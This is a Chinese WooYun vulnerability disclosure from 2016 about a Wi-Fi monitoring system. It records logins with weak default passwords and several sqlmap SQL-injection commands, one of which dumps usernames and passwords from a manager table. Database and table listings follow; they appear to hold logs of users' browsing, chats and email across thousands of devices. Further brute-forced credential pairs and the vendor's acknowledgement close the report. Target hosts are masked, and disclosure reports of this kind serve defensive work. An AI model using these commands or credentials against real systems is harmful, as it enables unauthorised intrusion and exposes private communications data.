乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-17: 细节已通知厂商并且等待厂商处理中 2016-04-18: 厂商已经确认,细节仅向厂商公开 2016-04-28: 细节向核心白帽子及相关领域专家公开 2016-05-08: 细节向普通白帽子公开 2016-05-18: 细节向实习白帽子公开 2016-06-02: 细节向公众公开
RT
看了这个http://**.**.**.**/bugs/wooyun-2016-0196866 迫不及待来试试 弱口令确认好多处 但是有用的就3个平台http://**.**.**.** admin 123456进入post注入:E:\sqlmap>sqlmap.py -u "http://**.**.**.**/buylist.php" --data "shopid=admin&shopname=admin&from=admin" --dbspost注入:E:\sqlmap>sqlmap.py -u "http://**.**.**.**/buylist.php" --data "shopid=admin&shopname=admin&from=admin" --dbspost注入:E:\sqlmap>sqlmap.py -u "http://**.**.**.**/package.php?action=add" --data "ription=1&number=1&money=1&sort=1&sub=%E4%BF%9D%E5%AD%98" --dbshttp://**.**.**.** admin 123456弱口令进入post注入:E:\sqlmap>sqlmap.py -u "http://**.**.**.**/index.php/admin/count/visitors?order=placenum&content=11&ftime=2016-03-29&ttime=2016-03-28" --dbspost注入:E:\sqlmap>sqlmap.py -u "http://**.**.**.**/index.php/admin/count/onlineplace?order=placenum&content=111" -D monitor -T monitor_manager -C "username,password" --dumphttp://**.**.**.**/login.php admin bswifi 肉口令post注入:E:\sqlmap>sqlmap.py -u "http://**.**.**.**/index.php" --data "hwid=11&place_name=11&place_code=111" --dbshttp://**.**.**.**/admin/index/index admin 1234567进入监控系统
可控制10000多台设备
数据库信息
back-end DBMS: MySQL 5.0.12available databases [33]:[*] bsremote[*] comiims[*] demoiims[*] demowifi[*] demowifieth[*] dx[*] iims[*] iimstest[*] information_schema[*] jxcount[*] monitor[*] mysql[*] openvpn[*] performance_schema[*] phpinfo[*] qscms[*] raffle[*] romupdate[*] sczy_iimstest[*] sczy_wifi[*] sczy_wifieth[*] smscenter[*] ssp_bswifi[*] tongji[*] webbswifi[*] wifi[*] wifieth[*] wifiethtest[*] wifiptr[*] wifitest[*] wireless[*] wxcms[*] zentao
表信息
Database: comiims+------------------------------------+---------+| Table | Entries |+------------------------------------+---------+| iims_zdata_url1459872000 | 1966478 || iims_zdata_url_mrg | 1916400 || iims_zdata_url1459267200 | 1877330 || iims_zdata_url1459612800 | 1841149 || iims_zdata_url1460131200 | 1709826 || iims_zdata_url1460390400 | 1473047 || iims_zdata_url1460649600 | 1441890 || iims_zdata_url1459008000 | 898420 || iims_zdata_start_end_mrg | 675019 || iims_zdata_start_end1460390400 | 514227 || iims_zdata_start_end1460649600 | 482555 || iims_zdata_url1460908800 | 474509 || iims_zdata_start_end1460131200 | 459982 || iims_zdata_url1458748800 | 317735 || iims_zdata_start_end1459872000 | 295944 || iims_zdata_chat_mrg | 236362 || iims_zdata_chat1459267200 | 226550 || iims_zdata_start_end1459612800 | 221900 || iims_zdata_chat1460131200 | 218788 || iims_zdata_chat1459872000 | 206799 || iims_zdata_start_end1460908800 | 192461 || iims_zdata_chat1459612800 | 192257 || iims_zdata_start_end1459267200 | 180957 || iims_zdata_chat1460649600 | 176895 || iims_zdata_chat1460390400 | 175719 || iims_zdata_chat1459008000 | 140209 || iims_zdata_start_end1459008000 | 127028 || iims_virtual | 92182 || iims_zdata_chat1460908800 | 59466 || iims_zdata_chat1458748800 | 44756 || iims_zdata_start_end1458748800 | 30799 || iims_data_mac | 21388 || iims_autonym | 19064 || iims_timeout_place | 10702 || iims_zdata_search1460131200 | 10126 || iims_zdata_search_mrg | 9879 || iims_zdata_search1459872000 | 9686 || iims_zdata_search1460390400 | 9100 || iims_zdata_search1459612800 | 8419 || iims_zdata_search1459267200 | 8054 || iims_zdata_search1460649600 | 7503 || iims_zdata_url1458489600 | 7090 || iims_zdata_action_log | 4642 || iims_zdata_district_code | 3679 || iims_zdata_search1459008000 | 3553 || iims_zdata_search1460908800 | 2376 || iims_zdata_search1458748800 | 1667 || iims_zdata_app_mrg | 1279 || iims_zdata_app1460390400 | 1213 || iims_zdata_history_stats_mrg | 1198 || iims_zdata_url1458230400 | 1130 || iims_zdata_app1460131200 | 1096 || iims_zdata_history_stats1464710400 | 1093 || iims_zdata_app1460649600 | 928 || iims_zdata_games1459267200 | 816 || iims_zdata_games1459612800 | 487 || iims_zdata_chat1458230400 | 479 || iims_zdata_app1459872000 | 459 || iims_zdata_app1459008000 | 440 || iims_zdata_games1459872000 | 422 || iims_zdata_feifamac | 406 || iims_zdata_city_code | 383 || iims_zdata_weibo_mrg | 368 || iims_zdata_police_code | 363 || iims_zdata_chat1458489600 | 358 || iims_zdata_app1459267200 | 352 || iims_zdata_app1460908800 | 351 || iims_zdata_weibo1459612800 | 332 || iims_zdata_games1460131200 | 318 || iims_zdata_weibo1460649600 | 275 || iims_zdata_app1459612800 | 244 || iims_zdata_weibo1460131200 | 234 || iims_zdata_weibo1459872000 | 222 || iims_zdata_weibo1459267200 | 207 || iims_zdata_weibo1460390400 | 202 || iims_zdata_games_mrg | 186 || iims_zdata_norecordplace | 166 || iims_zdata_start_end1458489600 | 155 || iims_zdata_app1458748800 | 136 || iims_zdata_games1460390400 | 134 || iims_zdata_games1460649600 | 129 || iims_zdata_ftp_mrg | 113 || iims_zdata_history_stats1456761600 | 105 || iims_zdata_games1459008000 | 104 || iims_zdata_weibo1460908800 | 93 || iims_zdata_ftp1460649600 | 89 || iims_zdata_place_type | 76 || iims_zdata_place_info | 64 || iims_zdata_pac_info | 61 || iims_zdata_games1460908800 | 57 || iims_zdata_ftp1460390400 | 53 || iims_member_menu | 46 || iims_zdata_email1459008000 | 45 || iims_zdata_email1460131200 | 45 || iims_zdata_bbs_mrg | 43 || iims_zdata_gamblings_mrg | 42 || iims_zdata_gamblings1460390400 | 41 || iims_zdata_email1459872000 | 36 || iims_zdata_bbs1459612800 | 35 || iims_zdata_provice_code | 35 || iims_zdata_bbs1460908800 | 31 || iims_zdata_bbs1459267200 | 29 || iims_zdata_ftp1460908800 | 24 || iims_zdata_bbs1460390400 | 18 || iims_zdata_email_mrg | 17 || iims_zdata_email1460649600 | 15 || iims_zdata_search1458489600 | 14 || iims_zdata_bbs1459872000 | 13 || iims_zdata_email1460390400 | 13 || iims_zdata_bbs1460131200 | 12 || iims_zdata_bbs1460649600 | 12 || iims_zdata_email1459267200 | 10 || iims_zdata_place_netype | 10 || iims_zdata_bbs1459008000 | 8 || iims_zdata_ftp1460131200 | 8 || iims_zdata_email1459612800 | 7 || iims_zdata_start_end1458230400 | 7 || iims_member | 5 || iims_member_group | 5 || iims_zdata_place_stats | 5 || iims_zdata_search1458230400 | 5 || iims_zdata_weibo1459008000 | 5 || iims_brandinfo | 4 || iims_zdata_ftp1459008000 | 4 || iims_zdata_controll | 2 || iims_zdata_controll_log | 2 || iims_zdata_email1458230400 | 2 || iims_zdata_email1460908800 | 2 || iims_zdata_ftp1459267200 | 2 || iims_zdata_weibo1458230400 | 2 || iims_times | 1 || iims_zdata_app1458489600 | 1 || iims_zdata_area_police | 1 || iims_zdata_base_info | 1 || iims_zdata_bbs1458230400 | 1 || iims_zdata_gamblings1460649600 | 1 || iims_zdata_pap_info | 1 || iims_zdata_setting | 1 |+------------------------------------+---------+
Database: iims+------------------------------+---------+| Table | Entries |+------------------------------+---------+| iims_zdata_url_mrg | 873660 || iims_zdata_wifi_wl1451577600 | 487731 || iims_zdata_wifi_wl_mrg | 487731 || iims_zdata_url1452009600 | 285826 || iims_zdata_url1451923200 | 243968 || iims_zdata_chat1451577600 | 201839 || iims_zdata_chat_mrg | 201839 || iims_zdata_url1451836800 | 180289 || iims_zdata_url1452096000 | 163577 || iims_zdata_virtual | 150402 || iims_zdata_changemac | 132227 || iims_zdata_feifasj | 73020 || iims_zdata_history_stats | 72769 || iims_zdata_action_log | 13522 || iims_zdata_search1451577600 | 4211 || iims_zdata_search_mrg | 4211 || iims_zdata_district_code | 3679 || iims_zdata_games1451577600 | 2678 || iims_zdata_games_mrg | 2678 || iims_zdata_weibo1451577600 | 1988 || iims_zdata_weibo_mrg | 1988 || iims_zdata_app1451577600 | 620 || iims_zdata_app_mrg | 620 || iims_zdata_city_code | 383 || iims_zdata_police_code | 363 || iims_zdata_email1451577600 | 258 || iims_zdata_email_mrg | 258 || iims_zdata_ssid | 173 || iims_zdata_norecordplace | 140 || iims_zdata_bbs1451577600 | 69 || iims_zdata_bbs_mrg | 69 || iims_zdata_place_info | 65 || iims_zdata_pac_info | 59 || iims_member | 53 || iims_member_menu | 53 || iims_zdata_provice_code | 35 || iims_member_group | 18 || iims_zdata_pap_info | 14 || iims_zdata_ap_info | 13 || iims_zdata_place_type | 13 || iims_zdata_place_netype | 10 || iims_zdata_place_stats | 5 || iims_zdata_controll | 3 || iims_zdata_telnet1451577600 | 3 || iims_zdata_telnet_mrg | 3 || iims_session | 1 || iims_site | 1 || iims_zdata_area_police | 1 || iims_zdata_base_info | 1 || iims_zdata_ccic | 1 || iims_zdata_enroll1451577600 | 1 || iims_zdata_enroll_mrg | 1 || iims_zdata_ftp1451577600 | 1 || iims_zdata_ftp_mrg | 1 || iims_zdata_setting | 1 |+------------------------------+---------+
http://**.**.**.**/index.php 50多个账户 解密不出来 随便输入了弱口令 进入 jxdubaoli jxdubaoli
11
http://**.**.**.**/ 密码也解密不出来 爆破进去了 tongwang2014 tongwang2014 sucaineng 123456
过滤
危害等级:中
漏洞Rank:10
确认时间:2016-04-18 08:58
非常感谢您的报告。报告中的问题已确认并复现。影响的数据:中攻击成本:低造成影响:中综合评级为:中,rank:10正在联系相关网站管理单位处置。
暂无